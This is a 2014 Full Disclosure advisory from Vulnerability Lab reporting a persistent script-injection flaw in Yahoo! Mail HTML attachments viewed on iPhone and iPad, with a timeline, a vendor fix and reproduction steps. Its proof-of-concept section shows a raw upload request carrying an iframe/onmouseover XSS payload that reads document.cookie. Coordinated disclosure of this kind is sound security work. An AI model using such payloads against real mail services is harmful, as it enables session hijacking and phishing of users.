[FD] Yahoo! Bug Bounty #30 YM - Application Side Mail Encoding (File Attachment) Vulnerability

Vulnerability Lab <[email protected]> Thu, 10 Jul 2014 14:52:43 +0200
Newsgroups gmane.comp.security.fulldisclosure,gmane.comp.security.full-disclosure
Message-ID <[email protected]>
Document Title:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Yahoo! Bug Bounty #30 YM - Application-Side Mail Encoding (File Attachment)=
 Vulnerability


References (Source):
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
http://www.vulnerability-lab.com/get_content.php?id=3D1137


Release Date:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
2014-07-08


Vulnerability Laboratory ID (VL-ID):
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
1137


Common Vulnerability Scoring System:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
5.3


Product & Service Introduction:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D
Yahoo! Inc. is an American multinational internet corporation headquartered=
 in Sunnyvale, California. It is widely =

known for its web portal, search engine Yahoo! Search, and related services=
, including Yahoo! Directory, Yahoo! Mail, =

Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, on=
line mapping, video sharing, fantasy sports =

and its social media website. It is one of the most popular sites in the Un=
ited States. According to news sources, =

roughly 700 million people visit Yahoo! websites every month. Yahoo! itself=
 claims it attracts `more than half a =

billion consumers every month in more than 30 languages.

(Copy of the Vendor Homepage: http://www.yahoo.com )


Abstract Advisory Information:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D
The Vulnerability-Laboratory Research Team has discovered a persistent inpu=
t validation vulnerability in the official Yahoo! Mail Service web-applicat=
ion.


Vulnerability Disclosure Timeline:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D
2013-11-08:	Researcher Notification & Coordination (Ateeq ur Rehman Khan - =
Core Research Team)
2013-11-09:	Vendor Notification (Yahoo! Security Team - Bug Bounty Program)
2014-02-18:	Vendor Response/Feedback (Yahoo! Security Team - Bug Bounty Pro=
gram)
2014-06-01:	Vendor Fix/Patch (Yahoo! Developer Team - Reward: HackerOne Pro=
gram)
2014-07-08:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Published


Affected Product(s):
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Yahoo!
Product: Yahoo! Mail - Web Application & API 2013 Q3


Exploitation Technique:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Remote


Severity Level:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Medium


Technical Details & Description:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D
A persistent script code inject web vulnerability has been discovered in th=
e official Yahoo Mail Service web-application & API. =

The vulnerability affects the Yahoo Mail Mobile Application for iPhone, iPa=
d and iPod touch. The vulnerability allows attackers =

to upload / attach own malicious .html files and send them to other Yahoo u=
sers.

During the testing, it was discovered that using Yahoo mail, it is possible=
 to include malicious script code within .html files =

and send them as attachments to other users. It seems that the application =
is not performing proper validation When uploading =

user attached files. Upon viewing these attached files from your iphone/ipa=
d device, the malicious script code gets executed =

directly hence leaving the victims vulnerable to persistent client side att=
acks.

The security risk of the persistent web vulnerability is estimated as mediu=
m with a cvss (common vulnerability scoring system) =

count of 5.3. Exploitation of this vulnerability requires low user interact=
ion. Successful exploitation of this vulnerability =

results in persistent phishing, persistent client side redirects, user sess=
ion hijacking and similar client side attacks.

Request Method(s):
				[+] POST

Vulnerable Application(s):
				[+] Yahoo! Mail - Web Application

Vulnerable Module(s): =

                                [+] Compose Mail > File Attachments

Vulnerable Parameter(s):
                                [+] Attach File


Proof of Concept (PoC):
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
The persistent input validation web vulnerability can be exploited by remot=
e attackers with low privileged yahoo web application =

account and low user interaction. For security demonstration or to reproduc=
e the vulnerability follow the provided information =

and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Register an yahoo mail account and login to the account system
2. Open the `compose a New Yahoo email` section
3. Click the `attach file` button in the compose mail section
4. Attach the POC.html file provided along with this advisory
5. Send out the email with the malicious test attachment to another yahoo t=
est account =

6. Using your iPad/iPhone device, click on the attachment link of the newly=
 received POC email
7. You should now see an iframe with vulnerability labs website proving the=
 existence of this vulnerability
8. Successful reproduce of the yahoo mail service vulnerability!


--- PoC Session Logs ---
POST /us.f1624.mail.yahoo.com/ya/upload_with_cred?output=3Dphp&cred=3DEncry=
pted HTTP/1.1
Host: bf1-attach.mail.yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Fir=
efox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8
Accept-Language: en-US,en;q=3D0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://us-mg6.mail.yahoo.com/neo/launch?.rand=3D7sd8nun2neu5c
Content-Length: 561
Content-Type: multipart/form-data; boundary=3D---------------------------23=
4701259230567
Origin: http://us-mg6.mail.yahoo.com
Cookie: Hidden
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------234701259230567
Content-Disposition: form-data; name=3D"filename
POC.html
-----------------------------234701259230567
Content-Disposition: form-data; name=3D"filesize"
120
-----------------------------234701259230567
Content-Disposition: form-data; name=3D"Filedata"; filename=3D"POC.html"
Content-Type: text/html
'%3d'>"><iframe src=3D'http://www.vulnerability-lab.com' onmouseover=3Daler=
t(document.cookie)></iframe>/927
"><h1>Testing POC Ateeq
-----------------------------234701259230567

Response:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://us-mg6.mail.yahoo.com
Cache-Control: private
Connection: Keep-Alive
Content-Length: 322
Content-Type: text/xml
Date: Fri, 08 Nov 2013 19:12:53 GMT
P3P: policyref=3D"http://info.yahoo.com/w3c/p3p.xml", CP=3D"CAO DSP COR CUR=
 ADM DEV TAI PSA PSD IVAi =

IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN CO=
M NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Server: HTTP/1.1 UserFiberFramework/1.0 =

Vary: Accept-Encoding
Via: HTTP/1.1 r03.ycpi.ac4.yahoo.net UserFiberFramework/1.0 =


<?xml version=3D"1.0" encoding=3D"UTF-8"?><Response>  <attachment>    <code=
>uploadAVNoVirus</code>    =

<id>e2fd91b75b55018624eef056c5913b0f</id>    <name>POC.html</name>    <type=
>text/html</type>    =

<size>126</size>  </attachment></Response><!-- web162405.mail.bf1.yahoo.com=
 compressed/chunked Fri Nov  8 11:12:53 PST 2013


Reference(s):
https://mail.yahoo.com


Solution - Fix & Patch:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Proper security controls should be implemented/enforced in the file attachm=
ent module to validate inputs and to persistent script code executions.


Security Risk:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
The security risk of persistent input validation web vulnerability in the y=
ahoo mail service application is estimated as medium.


Credits & Authors:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan (ateeq@evol=
ution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
The information provided in this advisory is provided as it is without any =
warranty. Vulnerability Lab disclaims all warranties, either =

expressed or implied, including the warranties of merchantability and capab=
ility for a particular purpose. Vulnerability-Lab or its suppliers =

are not liable in any case of damage, including direct, indirect, incidenta=
l, consequential loss of business profits or special damages, even =

if Vulnerability-Lab or its suppliers have been advised of the possibility =
of such damages. Some states do not allow the exclusion or limitation =

of liability for consequential or incidental damages so the foregoing limit=
ation may not apply. We do not approve or encourage anybody to break =

any vendor licenses, policies, deface websites, hack into databases or trad=
e with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- ww=
w.evolution-sec.com
Contact:    [email protected] 	- [email protected] 	=
       		- admin-sRlC7LJHFRmvt2SHZzvQTwC/[email protected]
Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		     =
  		- magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	    =
   		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rs=
s_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list=
-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file=
 requires authorization from Vulnerability Laboratory. Permission to =

electronically redistribute this alert in its unmodified form is granted. A=
ll other rights, including the use of other media, are reserved by =

Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advi=
sories, source code, videos and other information on this website =

is trademark of vulnerability-lab team & the specific authors or managers. =
To record, list (feed), modify, use or edit our material contact =

([email protected] or [email protected]) to get a pe=
rmission.

				Copyright =A9 2014 | Vulnerability Laboratory [Evolution Security]



-- =

VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: [email protected]



_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/